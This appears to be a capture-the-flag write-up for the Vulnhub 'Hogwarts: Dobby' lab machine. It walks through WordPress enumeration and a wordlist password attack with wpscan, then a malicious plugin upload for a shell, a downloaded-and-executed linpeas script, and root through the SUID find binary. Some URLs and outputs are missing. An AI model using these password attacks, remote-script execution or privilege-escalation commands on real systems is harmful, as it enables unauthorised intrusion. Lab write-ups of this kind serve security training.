dobby needs to be root to help harry potter, dobby needs to be a free elf
Difficult: Easy
This works better in VirtualBox

This is HOGWARTS: DOBBY from Vulnhub.


HTTP only; makes targeting easier.

HTTP and Rabbits

This one has a few rabbitholes, or at least red herrings. The page title on the website homepage is:


This decodes to:

too easy no? Potter

This doesn’t appear to be useful for anything.

At the very bottom of the page in the source code is a comment:

See: /alohomora

If we go there, we get a message:

Draco’s password is his house ;)


Gobuster finds a directory called /log. It says:

hint –> /DiagonAlley

The base64 encoded string decodes to:


This doesn’t appear to be useful for anything.

Going to /DiagonAlley, we find a Wordpress installation. Maybe we’re getting somewhere?


Enumerate with:

wpscan -e --url

And we have one user, draco. We find a post entitled Dobby that is written in what appears to be brainfuck, but running it through an interpreter only yields what might be a partial password - this is another distraction. Let’s run a password attack:

wpscan --url -U 'draco' -P /usr/share/wordlists/rockyou.txt


[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - draco / slytherin                                                                                                                     
Trying draco / slytherin Time: 00:18:42 <                                                               > (14930 / 14359323)  0.10%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: draco, Password: slytherin

Apparently the hint from /alohomora wasn’t a red herring. Whatever.


The installation is in Spanish (I think) so it’s a bit hard to read but I can upload a malicious plugin as a zip file (see midnight for details). This gets me a shell.


As usual, run linpeas from /dev/shm after upgrading my shell:

www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ which python3
which python3
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<in$ python3 -c 'import pty;pty.spawn("/bin/bash");'  
www-data@HogWarts:/var/www/html/DiagonAlley/wp-admin$ cd /home
www-data@HogWarts:/home/dobby$ cd /dev/shm
cd /dev/shm
www-data@HogWarts:/dev/shm$ wget
--2020-11-14 08:35:43--
Resolving (
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 297851 (291K) [text/plain]
Saving to: ‘’          100%[===================>] 290.87K  --.-KB/s    in 0.05s   

2020-11-14 08:35:44 (5.41 MB/s) - ‘’ saved [297851/297851]

www-data@HogWarts:/dev/shm$ chmod +x
chmod +x
www-data@HogWarts:/dev/shm$ ./

This gives us not one but two SUID binaries of interest - base32 and find. We’ll take find as per GTFOBins

www-data@HogWarts:/dev/shm$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# whoami
# less proof.txt
less proof.txt

This box didn’t have cat but it still had head and less so no problem. Done and done.